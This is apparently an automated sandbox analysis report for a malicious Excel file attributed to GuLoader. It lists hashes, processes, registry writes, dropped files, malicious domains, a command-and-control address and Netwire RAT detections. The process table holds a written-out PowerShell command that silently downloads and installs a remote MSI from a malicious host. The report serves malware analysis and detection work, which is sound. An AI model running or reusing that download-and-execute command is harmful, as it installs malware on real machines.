| File name: | bad.xls |
| Full analysis: | https://app.any.run/tasks/bf804d8e-dd6d-410a-a5a3-c6d36f2fa06d |
| Verdict: | Malicious activity |
| Threats: | GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. |
| Analysis date: | March 30, 2020, 01:21:14 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows-Benutzer, Last Saved By: DoNt HaVe, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Oct 22 08:10:34 2019, Last Saved Time/Date: Thu Mar 19 16:56:36 2020, Security: 0 |
| MD5: | 67DDCA4FF283C339BD9FC5E7B0BAA5FA |
| SHA1: | C33AE7108E38E9B4F6C7257BEB9E084DCDE87ECF |
| SHA256: | 10A82C441E89A4E2815D1E5006AACF3CF57F414D1B99A893E7A34A37108A1A52 |
| SSDEEP: | 12288:DSb184Qxo3+M++OhnsmPjpMoflTT7eiZ76wjx+OCIvLbizbJ:DSNOM+jTryihFetWzG |
| .xls | | | Microsoft Excel sheet (78.9) |
|---|
| Author: | Windows-Benutzer |
|---|---|
| LastModifiedBy: | DoNt HaVe |
| Software: | Microsoft Excel |
| CreateDate: | 2019:10:22 07:10:34 |
| ModifyDate: | 2020:03:19 16:56:36 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: |
|
| HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2376 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2436 | "C:\Windows\Installer\MSI89FB.tmp" | C:\Windows\Installer\MSI89FB.tmp | — | msiexec.exe | |||||||||||
User: admin Company: ALKALISEREDE Integrity Level: MEDIUM Description: SHUTTER Exit code: 0 Version: 1.00.0009 Modules
| |||||||||||||||
| 3072 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3872 | powershell msiexec /q /i http://binexeupload.ru/unmodifiedness.msi | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3900 | "C:\Windows\Installer\MSI89FB.tmp" | C:\Program Files\internet explorer\ieinstal.exe | MSI89FB.tmp | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Add-on Installer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 4048 | "C:\Windows\system32\msiexec.exe" /q /i http://binexeupload.ru/unmodifiedness.msi | C:\Windows\system32\msiexec.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | write | Name: | np1 |
Value: 6E703100000C0000010000000000000000000000 | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
| (PID) Process: | (3072) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: Off | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3072 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C6E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\58U915MRCMP7F3UDA415.temp | — | |
MD5:— | SHA256:— | |||
| 2376 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFC6E702BE26387734.TMP | — | |
MD5:— | SHA256:— | |||
| 2376 | msiexec.exe | C:\Config.Msi\a68910.rbs | — | |
MD5:— | SHA256:— | |||
| 2376 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF9CB0CB7FAFF551C7.TMP | — | |
MD5:— | SHA256:— | |||
| 2376 | msiexec.exe | C:\Windows\Installer\MSI89FB.tmp | executable | |
MD5:44744393736476EA5EAFF80B24B82F02 | SHA256:B71F954A6371076F9C87B1005208BF5E712806AF1F5E037B5EEAA6AADAC6D7FB | |||
| 3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
| 2376 | msiexec.exe | C:\Windows\Installer\a6890f.ipi | binary | |
MD5:C02FA018D997A1FD54A473DE0864D155 | SHA256:3D2E60043D3F341E81BAB374E3C1FA2DE253277A769244CDC801B0ABC3CB22D5 | |||
| 2376 | msiexec.exe | C:\Windows\Installer\MSI8620.tmp | executable | |
MD5:ECD1E0DAED0D11FAE60B5200B2757B36 | SHA256:92DD50388595C86C0A87639A566B9E44D636621CFF94180EDD59AA28AC169BDA | |||
| 2376 | msiexec.exe | C:\Windows\Installer\MSI896D.tmp | binary | |
MD5:818458401F2C917DF1902262844AD701 | SHA256:F02B07F41FC3D19DC8F3C65260356CA96E492185E7AB27AAAA7C7E075293590F | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2376 | msiexec.exe | 213.219.212.206:80 | binexeupload.ru | JSC Digital Network | RU | malicious |
3900 | ieinstal.exe | 213.219.212.206:80 | binexeupload.ru | JSC Digital Network | RU | malicious |
3900 | ieinstal.exe | 79.124.8.7:1986 | — | Transact Payment Services Group - Bulgaria EOOD | BG | malicious |
Domain | IP | Reputation |
|---|---|---|
binexeupload.ru |
| malicious |
stubbackup.ru |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
2376 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |
2376 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
3900 | ieinstal.exe | A Network Trojan was detected | MALWARE [PTsecurity] EJNT_Loader |
3900 | ieinstal.exe | A Network Trojan was detected | MALWARE [PTsecurity] Netwire.RAT |